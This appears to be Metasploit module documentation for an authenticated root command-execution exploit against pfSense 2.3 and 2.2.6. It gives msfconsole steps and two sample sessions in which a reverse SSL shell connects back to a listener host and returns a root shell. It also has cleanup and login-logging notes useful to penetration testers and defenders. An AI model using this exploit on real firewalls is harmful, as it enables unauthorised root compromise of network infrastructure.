## Description This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands as root. This module has been tested successfully on version 2.3-RELEASE, and 2.2.6. ## Vulnerable Application This module has been tested successfully on version CE 2.3 amd64, and 2.2.6 amd64. Installer: * [pfSense CE 2.3](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz) ## Verification Steps 1. Start `msfconsole` 2. Do: `use exploit/unix/http/pfsense_group_member_exec` 3. Do: `set rhost [IP]` 4. Do: `set username [username]` 5. Do: `set password [password]` 6. Do: `exploit` 7. You should get a session ## Scenarios ### 2.3-Release amd64 ``` [*] Processing pfsense.rc for ERB directives. resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec resource (pfsense.rc)> set rhost 2.2.2.2 rhost => 2.2.2.2 resource (pfsense.rc)> set verbose true verbose => true resource (pfsense.rc)> set lhost 1.1.1.1 lhost => 1.1.1.1 resource (pfsense.rc)> check [*] 2.2.2.2:443 The target service is running, but could not be validated. resource (pfsense.rc)> exploit [*] Started reverse double SSL handler on 1.1.1.1:4444 [*] CSRF Token for login: sid:a11be2ee5849522898e2c1ff23739b35c76435bf,1510545358;ip:d70924f708189287bdee1e08d7fa83758a0e1f68,1510545358 [*] Successful Authentication [*] pfSense Version Detected: 2.3-RELEASE [+] Login Successful [*] CSRF Token for group creation: sid:823a6f854ad1bae307c2959e95ccc98a8d72f2c1,1510545361 [*] Manual removal of group aJPEfJLDKT is required. [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 5ER6rqZOjOSGjRml; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "5ER6rqZOjOSGjRml\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:25824) at 2017-11-19 08:15:00 -0500 whoami root uname -a FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016 root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense amd64 ``` ### 2.2.6 amd64 ``` [*] Processing pfsense.rc for ERB directives. resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec resource (pfsense.rc)> set rhost 3.3.3.3 rhost => 3.3.3.3 resource (pfsense.rc)> set verbose true verbose => true resource (pfsense.rc)> set lhost 1.1.1.1 lhost => 1.1.1.1 resource (pfsense.rc)> check [*] 3.3.3.3:443 The target is not exploitable. resource (pfsense.rc)> exploit [*] Started reverse double SSL handler on 1.1.1.1:4444 [*] CSRF Token for login: sid:bb80526160efcf79d8660d1a31f6bf88e154b38e,1511091712;ip:42d05b73fc9b2d31c54333a60fd308dfbd4da97a,1511091712 [*] Successful Authentication [*] pfSense Version Detected: 2.2.6-RELEASE [+] Login Successful [*] CSRF Token for group creation: sid:d49a6dc5b7e98c92a7772c605af3586a1f3adc75,1511091715 [*] Manual removal of group okUPTvzysL is required. [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7hKg6oD9DkwXYRtt; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "7hKg6oD9DkwXYRtt\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (1.1.1.1:4444 -> 3.3.3.3:34403) at 2017-11-19 06:42:00 -0500 whoami root uname -a FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64 ``` ## Cleanup Manual cleanup is required. The group name is printed during exploitation. ## Logging Logging into the web interface writes a line to the system out on the console similar to: `pfSense php-fpm[72834]: /index.php: Succeessful login for user 'admin' from [ip]`